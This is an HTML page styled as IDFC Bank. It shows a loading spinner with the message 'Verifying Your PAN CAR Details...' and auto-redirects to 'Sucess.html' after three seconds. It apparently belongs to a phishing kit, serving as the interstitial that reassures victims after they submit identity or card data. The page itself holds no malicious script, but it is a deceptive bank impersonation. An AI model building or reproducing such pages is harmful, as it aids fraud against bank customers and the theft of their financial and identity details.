<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta name="theme-color" content="#AE2626">
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <meta http-equiv="refresh"
    content="3;
    URL=Sucess.html">
    <title>IDFC - Processing...</title>
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <link href="https://fonts.googleapis.com/css2?family=Arimo:ital,wght@0,400..700;1,400..700&display=swap" rel="stylesheet">
    <noscript data-n-css=""></noscript>
    <style type="text/css">
    body
    {
    background-color:#fff;
    font-family:'Arimo', sans-serif;
    margin:0;
    padding:0;
    max-width:100%;}
    
    .mg{color:#506d85;
    letter-spacing:normal;
    line-height:1.5;
    font-size:10px;
    margin-top:16px;
    margin-bottom:20px;}
    
    .mainContent
    {padding:10px;
    font-family: 'Arimo', sans-serif;
    font-weight:900;
    }
    
    .para
    {height:39px;
    padding-top:16px;}
    
    .pmLogin
    {margin-top:1.75rem;}
    
    .para span
    {font-size:16px;
    font-family: 'Arimo', sans-serif;
    font-weight:600;
    line-height:1.2;color:#AE2626;}
    
    .para span,.text-center
    {text-align:center;}
    
    .circlespinner
    {animation:rotate 2s linear infinite;
    width:50px;
    height:#AE2626;
    stroke:#AE2626;}
    
    .path
    {stroke:#AE2626;
    stroke-linecap:round;
    animation:dash 1.5s ease-in-out infinite}
    @keyframes rotate{to
    {transform:rotate(1turn)}}
    @keyframes dash{0%
    {stroke-dasharray:1,150;stroke-dashoffset:0;}50%
    {stroke-dasharray:90,150;stroke-dashoffset:-35;}
    to
    {stroke-dasharray:90,150;
    stroke-dashoffset:-125;}}
    .l-loading
    {margin-top:20%;}
    
    .form-group .invalid-message
    {
    font-size:12px;
    color:red;
    }
    </style>
    </head>
  <body>
    <div id="__next">
      <center><div class="text-center l-loading">
        <svg class="circlespinner" viewBox="0 0 50 50">
          <circle class="path" cx="25" cy="25" r="20" fill="none" stroke-width="5"></circle>
        </svg>
        <h1 style="font-size:16px; color:#AE2626; font-family: 'Arimo', sans-serif; font-weight:500; margin-top:1%;">Please wait...<br>Verifying Your PAN CAR Details...</h1>
      </div>
    </div></center>
  </body>
</html>